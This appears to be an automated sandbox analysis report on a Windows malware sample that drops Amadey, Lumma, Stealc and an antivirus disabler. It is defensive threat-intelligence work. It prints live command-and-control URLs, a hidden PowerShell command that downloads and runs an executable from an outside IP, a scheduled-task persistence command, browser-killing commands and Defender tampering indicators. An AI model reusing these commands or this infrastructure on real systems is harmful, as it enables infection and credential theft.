Analysis

  • max time kernel
    144s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 13:42

General

  • Target

    2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    0e4ac18b2224b5d46bfb6a68417a0104

  • SHA1

    38922c092ce214d8f87586f7ed13d68814a95057

  • SHA256

    31bd1ef59c8715bdd8a5bf2e8231e43f9156d1b71901061b552dbbd37550960a

  • SHA512

    6ffa7135c8a61329be36dbfca51c8f74b75e8ab8596d8407c1ea628f27b8b9a3e862ffdcfb1de40379b91ca33109bc0f2b9b57cffe3735649f9c8b86796e8629

  • SSDEEP

    24576:/qDEvCTbMWu7rQYlBQcBiT6rprG8a0ou:/TvC/MTQYxsWR7a0o

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 5 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 26 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3464
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn LLSzdmaekcr /tr "mshta C:\Users\Admin\AppData\Local\Temp\q4WTMsVnl.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2248
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn LLSzdmaekcr /tr "mshta C:\Users\Admin\AppData\Local\Temp\q4WTMsVnl.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2604
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\q4WTMsVnl.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1956
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'V1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2120
        • C:\Users\Admin\AppData\Local\TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE
          "C:\Users\Admin\AppData\Local\TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:904
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3400
            • C:\Users\Admin\AppData\Local\Temp\10381660101\84687d1682.exe
              "C:\Users\Admin\AppData\Local\Temp\10381660101\84687d1682.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1868
            • C:\Users\Admin\AppData\Local\Temp\10381670101\bfdff198ba.exe
              "C:\Users\Admin\AppData\Local\Temp\10381670101\bfdff198ba.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1752
            • C:\Users\Admin\AppData\Local\Temp\10381680101\020efe7ce4.exe
              "C:\Users\Admin\AppData\Local\Temp\10381680101\020efe7ce4.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:4744
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3836
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2564
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1712
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3304
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4752
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:392
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  8⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:3656
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {ed744ee6-0b74-45eb-a102-25d84dc7f1a1} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                    9⤵
                      PID:4368
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2476 -prefsLen 27135 -prefMapHandle 2480 -prefMapSize 270279 -ipcHandle 2496 -initialChannelId {ee7d93b8-c12c-47ea-a019-19b09a36911e} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                      9⤵
                        PID:3056
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3828 -prefsLen 25164 -prefMapHandle 3832 -prefMapSize 270279 -jsInitHandle 3836 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3844 -initialChannelId {1e67f631-8600-43d5-adac-0e0b30657a7d} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                        9⤵
                        • Checks processor information in registry
                        PID:2808
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4024 -prefsLen 27276 -prefMapHandle 4028 -prefMapSize 270279 -ipcHandle 4100 -initialChannelId {c05631c2-b39c-4df6-b609-3d888183b3b3} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                        9⤵
                          PID:720
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4408 -prefsLen 34775 -prefMapHandle 4412 -prefMapSize 270279 -jsInitHandle 4416 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4424 -initialChannelId {2f22d7fe-073a-45a9-8cd4-18d98c65a37e} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                          9⤵
                          • Checks processor information in registry
                          PID:4464
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4900 -prefsLen 35012 -prefMapHandle 4932 -prefMapSize 270279 -ipcHandle 4968 -initialChannelId {50a6d90b-8a1b-4a8c-bf43-0975296ecf1c} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                          9⤵
                          • Checks processor information in registry
                          PID:5296
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5328 -prefsLen 32952 -prefMapHandle 5324 -prefMapSize 270279 -jsInitHandle 5320 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5336 -initialChannelId {624c596d-1a98-475e-ba26-d21de8ecc085} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                          9⤵
                          • Checks processor information in registry
                          PID:5012
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5452 -prefsLen 32952 -prefMapHandle 5456 -prefMapSize 270279 -jsInitHandle 5516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5524 -initialChannelId {60bfabe9-6647-4a65-b163-5016e131a865} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                          9⤵
                          • Checks processor information in registry
                          PID:3184
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5836 -prefsLen 32952 -prefMapHandle 5840 -prefMapSize 270279 -jsInitHandle 5844 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5852 -initialChannelId {52100647-0a33-4509-9451-eab14508b2b8} -parentPid 3656 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3656" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                          9⤵
                          • Checks processor information in registry
                          PID:3556
                  • C:\Users\Admin\AppData\Local\Temp\10381690101\72ed6b8663.exe
                    "C:\Users\Admin\AppData\Local\Temp\10381690101\72ed6b8663.exe"
                    6⤵
                    • Modifies Windows Defender DisableAntiSpyware settings
                    • Modifies Windows Defender Real-time Protection settings
                    • Modifies Windows Defender TamperProtection settings
                    • Modifies Windows Defender notification settings
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Windows security modification
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4772
                  • C:\Users\Admin\AppData\Local\Temp\10381700101\98d889d34a.exe
                    "C:\Users\Admin\AppData\Local\Temp\10381700101\98d889d34a.exe"
                    6⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5772
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:1808
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:5268

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\tdlob5bw.default-release\activity-stream.discovery_stream.json.tmp

          Filesize

          24KB

          MD5

          c81d306774ba677e29e24c0b3164d7d6

          SHA1

          027477a4ce62b835c25ad4f97f66182af04d53ce

          SHA256

          0520ebe0748e97e568dc89096fa19146ffce452fc65cb0f8913e4dd467602039

          SHA512

          e52fb9cbaff0f831248d043dd3ace00a68ca324d18ae4a8081bdeb09c7ff844a7c2181237a97591fb5ba3bbfffcd7f547f9198fe27d7c7b959e7f11d8f443e66

        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\tdlob5bw.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

          Filesize

          13KB

          MD5

          ae8bf22200b0bdb9a5e81c36c817ac90

          SHA1

          caf9162df7d8c5c7352db88e896cfb6eec32bd99

          SHA256

          a0a8e0fe823df407d4d11521fec9fa92ed3b7439b52411de131f4edcb74e53ff

          SHA512

          67e1cf13420f089851288735e9e112cf9c2ae5f9b86a763082be234b95c6fd1a04ae35e170e2a7400f97ef74851f6a7cec7e5d848754ef5236bfcfe2bc90d634

        • C:\Users\Admin\AppData\Local\TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE

          Filesize

          1.8MB

          MD5

          89431b16b25281a50a173f359ecbcebf

          SHA1

          a5931bc59fd615f199461eb009262d26ff34c814

          SHA256

          78d33d02042213510b32b2c13599a33d000cc66fd295714300a557872cfc125e

          SHA512

          498c9a04ef7a5e60d249207dc25db7e3f38dc4339be10702a02d5c922ec30be0b254c8a55552642c1540aeec6dfa26de49a7abd7f65d7a6978352720d9adb7f2

        • C:\Users\Admin\AppData\Local\Temp\10381660101\84687d1682.exe

          Filesize

          2.9MB

          MD5

          87e1ef76fcf8436dd835e12c500e4e83

          SHA1

          e639e7352e4a21263120988a318f5e9b3dd8a275

          SHA256

          357019ac110c232d6ee370d8ef02822c5963e72584ec7f897381679fe7ab38da

          SHA512

          ab8e05c697f8f332c847e6661623b8f08d0adbbd8e5860accb2a608d1b896c031ea4b840cff4332637710e755108442fa9533375cfb1ec8164958e48acc1ccf3

        • C:\Users\Admin\AppData\Local\Temp\10381670101\bfdff198ba.exe

          Filesize

          1.7MB

          MD5

          5dd55b0c5021bf7a1abd5dcff2598695

          SHA1

          d523df50545388ae0465ed4ef58e05c387b38d8d

          SHA256

          143fa09fc53e1bd7eb74d005c66f39a90b87901b69b6ea3209e4c33cf7b70f0c

          SHA512

          a36dd71d4b48a30f0ef92bbbe59d9f1accfe152b7fec9c4f1a3896485bed084963821b5e6cb975bdd69ad3b867ed9c497733583f2e04f0617ebb2d6daef8670b

        • C:\Users\Admin\AppData\Local\Temp\10381680101\020efe7ce4.exe

          Filesize

          950KB

          MD5

          abb7738b0d8041d72718a0358da1d866

          SHA1

          6f0a0aeccbab99ab5e06819e48c0a5761e42a1ab

          SHA256

          77b0911b9840fed6e2bb625e00e221adc5b5868198b4916303675154b4b81d5e

          SHA512

          69097dd3019455023f0b142d65ae68525b372e0960d0e9995340ef736461582e459608475b361cb47d97055cc7cbc88642b55f6966ec6461289f92a6406bc0c9

        • C:\Users\Admin\AppData\Local\Temp\10381690101\72ed6b8663.exe

          Filesize

          1.7MB

          MD5

          c5531ef7f8f5936fbaef26e92eff6586

          SHA1

          b29d02e373485971da8fba4093d5b2ecc711b07c

          SHA256

          235dad4176b568a8137525842b7da13817e7685b83b9970839b1c67b8f732c1f

          SHA512

          dc00c684f0f4c5db6c2f3c73fb8906c596c6efa008149b9a8c9db08ec6fc07a9fb409d3d0fc70132032a3f2d58e127d897cdc8005e2da297b221da03b7d27a6f

        • C:\Users\Admin\AppData\Local\Temp\10381700101\98d889d34a.exe

          Filesize

          1.8MB

          MD5

          242617c7d9c922457ad4ea64cb40f6ea

          SHA1

          9725d4a1e476d9fb9d3e0b495fa4796b250470ba

          SHA256

          f7fa8ca1c918f76a3b9057bde8cee2ce5bb6dda1b069cbfc531c513ab6b060c2

          SHA512

          f122a19107afd8d4914bf5997ad64c26468b0a1b2db8802a47345acd7e60d925a41cc4a2fa934a752b021ba7b8cefa886c16ca728da01ce21942d6e91675a6ab

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_scwp3gm2.fw2.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\q4WTMsVnl.hta

          Filesize

          717B

          MD5

          db47df109a7599f531b3b4b6984807f2

          SHA1

          e8c017c7297afc74afb0d4f34cc6fd21ac610f00

          SHA256

          6fb5311d74c5c3d59ac18367e658baa8cfc7449f4900ca77b4b2cf153f482c9c

          SHA512

          48c17eff96631f518ed34d095a8abd6db675034ba7eb0dc5c510d0eb21d5a67f9abadbf614085793443a3a0d68a42cdf26508be6519e53cde4869738a0dbf807

        • C:\Users\Admin\AppData\Local\Temp\tmpaddon

          Filesize

          11KB

          MD5

          25e8156b7f7ca8dad999ee2b93a32b71

          SHA1

          db587e9e9559b433cee57435cb97a83963659430

          SHA256

          ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986

          SHA512

          1211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56

        • C:\Users\Admin\AppData\Local\Temp\tmpaddon

          Filesize

          14.0MB

          MD5

          bcceccab13375513a6e8ab48e7b63496

          SHA1

          63d8a68cf562424d3fc3be1297d83f8247e24142

          SHA256

          a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9

          SHA512

          d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484

        • C:\Users\Admin\AppData\Local\Temp\tmpaddon

          Filesize

          502KB

          MD5

          e690f995973164fe425f76589b1be2d9

          SHA1

          e947c4dad203aab37a003194dddc7980c74fa712

          SHA256

          87862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171

          SHA512

          77991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\AlternateServices.bin

          Filesize

          8KB

          MD5

          c3d43c4f27c0e4625fff4c568ba0afb4

          SHA1

          1ccc441674631f33c7112384590579a47e3f4e06

          SHA256

          3074d6c7cd893725ebe30faa24d53549da36f202460c147cf7090bd946db9abc

          SHA512

          249b050750cd5d3fa0c314cb8db1782dcbef2b036ad0e5685090dc24b7ba24cab7549f6f9c6f0192aedbbf7a3810e7ee473be626f34380edffaa173f74a70fe2

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\AlternateServices.bin

          Filesize

          17KB

          MD5

          f8338d126476db878bf659821f3284bf

          SHA1

          ca480d42a763b1d6232695c43cd2056f3c537370

          SHA256

          5c628bb76ff310aad6d8d0833127e0270ee8523afdd95c2cd201fac030cf6c38

          SHA512

          cfbf22ba1ec6780ce3a88e4a1c03db00f76a3d2db4e75499e736c137724e3a128e48d36bd70a11231001de7f0241a55597742dc1c3979df459c4e35ec3aa7720

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\db\data.safe.tmp

          Filesize

          6KB

          MD5

          c747e7ccc86a9ae285d05e4dbb86ba2f

          SHA1

          4b5a3a8890b30e62065bc861c657aacd1b89c1be

          SHA256

          68bfb6799186f7bf8cf2fd66e8401219e803f4b78243d484b01f25787a8b461a

          SHA512

          d23738b6c58e40e9e5fd95b3db3c366678ac56d49c6f74d41b653a1e22b2e235f60eb3135dffb2d6333f57248479963d5d118f326ad27f9a97f58a1262f0df2a

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\events\events

          Filesize

          1KB

          MD5

          e80f52887653f73b73c7e4ca8fbc23ee

          SHA1

          3859d607109252475a156df84d0e77c869fb2e9a

          SHA256

          38da49b2a564289acbc1f8f7185e50d44186b497b8bd4203e221403e7fce2cd9

          SHA512

          c863fd3db1a72d43b56a93748dbf0f6e1d9ba98efeb2ab38ab651412c860b5da8938d84c068e36d8f16bd6e4fbd078d6d0f0eee5e07e531a1268bac53f936674

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\141076cc-b8d6-4e04-847d-35da8dd9c9f6

          Filesize

          2KB

          MD5

          9263f4d9070a7a440889645897be2ce4

          SHA1

          2211b09c22753da84d3b4677472963fed55e2606

          SHA256

          0b0cec3601987dac787e5c23c358892c7b97de567a0e4e4b78f553b9b8d8dee0

          SHA512

          141c55bc520296b68006978b52db6986ce7c9df2acd5cc56e0b11e1d06941d37b981a192f2d2c81295be332db7d6a1339a335728d06b3336bd4fcc67159bc3a9

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\1f1f93e2-8bad-4a0d-975c-b3d15de53e05

          Filesize

          883B

          MD5

          fb356a57c7433c401371aa4149dbaf5c

          SHA1

          c8e83b9f1859c9e96b328d0a39966a570e366080

          SHA256

          fd36963458c97dff12d9b19bbe3a61ab248b8ff1b7f408e10f5e34b2d194af02

          SHA512

          2bb7f010c0c045d1a1b66c62de587cfbbc2cc2918b3ad831f4ce6848a567dca328418ed75b9152350ac595935b9baf3649197efc8531b226033f53264fa77d45

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\2069246d-a9c8-4c22-b1fe-52f84cce1948

          Filesize

          16KB

          MD5

          0b5c2b2d86bad313f42d7ad77243dbbc

          SHA1

          fa8db3db31b2a83ff9ff30ea3270b05c4a0041f8

          SHA256

          39af6784b42d24a1fdd50987c96f78ef3529694378de54b49f52b4ff195c8323

          SHA512

          c3cde5375fa4109a6079d0e023881c930fa0df7c0e1d82ea812ccfc80ba36847de6a31e192c081d9a871ff3c17a93d10339a33a4d81a64253f096df6c298a43c

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\2a3439f4-224f-4f89-bb97-30049f5f9b33

          Filesize

          235B

          MD5

          1bb4395c4d428798568a3525b3f902f7

          SHA1

          86330e2614537a1cf0d70d9c24a43ff4ffa6a8db

          SHA256

          ae4602687c659202d2736fc7b2370c877885ae738dec9f376d5afcb0e5606f4b

          SHA512

          d6ec3e95930aa73f4272d8602f7970647c2aee2a09755c9686e03dda4d6fe83a765b711428009402cfcdb1f806f776ff44ea91998cd13f114f7634329551f985

